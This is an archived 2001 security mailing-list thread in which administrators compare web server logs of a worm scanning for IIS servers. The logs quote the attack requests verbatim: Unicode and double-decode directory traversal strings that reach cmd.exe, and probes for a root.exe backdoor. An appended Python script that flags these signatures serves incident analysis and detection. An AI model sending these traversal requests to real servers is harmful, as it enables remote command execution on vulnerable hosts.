Security Incidents mailing list archives

Re: CodeBlue finally hitting, or what?


From: Jason Giglio <jgiglio () netmar com>
Date: Tue, 18 Sep 2001 11:36:35 -0400

I've gotten 721 hits just today for cmd.exe of some sort.  We run apache so
no worries, but this worm has hit faster than anything I've seen before.

All from the people that share the same class A as us.  This one must scan
its own class C then B then A first.  (I know I'm probably abusing the
terms, but you all know what I mean)


65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
On 2001.09.18 10:24 "Portnoy, Gary" wrote:
Greetings,

I am suddenly seeing hundreds of Unicode traversal requests coming in from
all over the world, many of them from previous CodeRed victims.  I am
guessing someone changed CodeBlue to make it spread faster, because before I
saw maybe 1 or 2 CodeBlue attempts a day, and so far I've seen at least 20
in the last hour.  Just as a way to help fingerprint it, a few of the
attempted exploits use the multiple decode vulnerability....

-Gary-

12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"

Gary Portnoy
Network Administrator
gportnoy () belenosinc com

PGP Fingerprint: 9D69 6A39 642D 78FD 207C  307D B37D E01A 2E89 9D2C


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com


--
Jason Giglio
Information Technology Coordinator, Smyth Companies, Bedford VA
Phone: 540-586-2311x113
e-mail: jgiglio () smythco com
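As an added illustration (not code from either poster), the following Python pass walks a subset of the log lines quoted in this thread and tags each request with the signatures the two posts describe: cmd.exe reached through a drive-mapped virtual directory, the overlong-UTF-8 Unicode traversal, the double-decode ("multiple decode") form that only reveals a path separator after a second decode, and root.exe probes; it then counts probes per source and lists the sources that fall inside the server's own /8, the pattern Jason noticed. The server address 65.1.2.3 is a hypothetical local IP, and the log sample is a constructed subset of the lines above plus one benign request.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network
from urllib.parse import unquote

# Constructed sample: a subset of the lines quoted in the two posts above plus one
# benign request. The server address 65.1.2.3 used in the test is a hypothetical local IP.
SAMPLE_LOG = """\
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
10.0.0.5 - - [18/Sep/2001:10:20:00 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "-"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Overlong UTF-8 spellings of '/' and '\' (%c0%af, %c0%2f, %c1%9c, %c1%1c) seen in the logs above.
OVERLONG = re.compile(r'%c[01]%[0-9a-f]{2}', re.I)


def classify(path):
    """Tag one request path with the worm signatures both posters describe."""
    p, tags = path.lower(), []
    if 'root.exe' in p:
        tags.append('root.exe')        # probe for a shell copy left by an earlier compromise
    if OVERLONG.search(p):
        tags.append('overlong-utf8')   # the Unicode traversal variant
    once = unquote(p)                  # one decode, as the server does before its path check
    if '%5c' in once or '%2f' in once:
        tags.append('double-decode')   # %255c, %%35%63, %25%35%63: a separator survives one decode
    final = unquote(once).replace('\\', '/')
    if 'cmd.exe' in final and ('../' in final or final.startswith(('/c/', '/d/'))):
        tags.append('cmd.exe')         # traversal, or a drive-mapped virtual dir, reaching the shell
    return tags


def summarize(log_text, local_ip):
    """Count probes per signature and per source; list sources inside our own /8."""
    sigs, sources = Counter(), Counter()
    local_a = ip_network(f'{local_ip}/8', strict=False)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        tags = classify(m['path']) if m else []
        if tags:
            sources[m['ip']] += 1
            sigs.update(tags)
    same_a = [ip for ip in sources if ip_address(ip) in local_a]
    return {'probes': sum(sources.values()), 'signatures': dict(sigs),
            'sources': dict(sources), 'same_class_a': same_a}
```

Running summarize(SAMPLE_LOG, '65.1.2.3') on a real access log gives the per-source and per-signature counts Gary used to fingerprint the new variant, and the same_class_a list makes Jason's "same class A" observation checkable rather than eyeballed.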
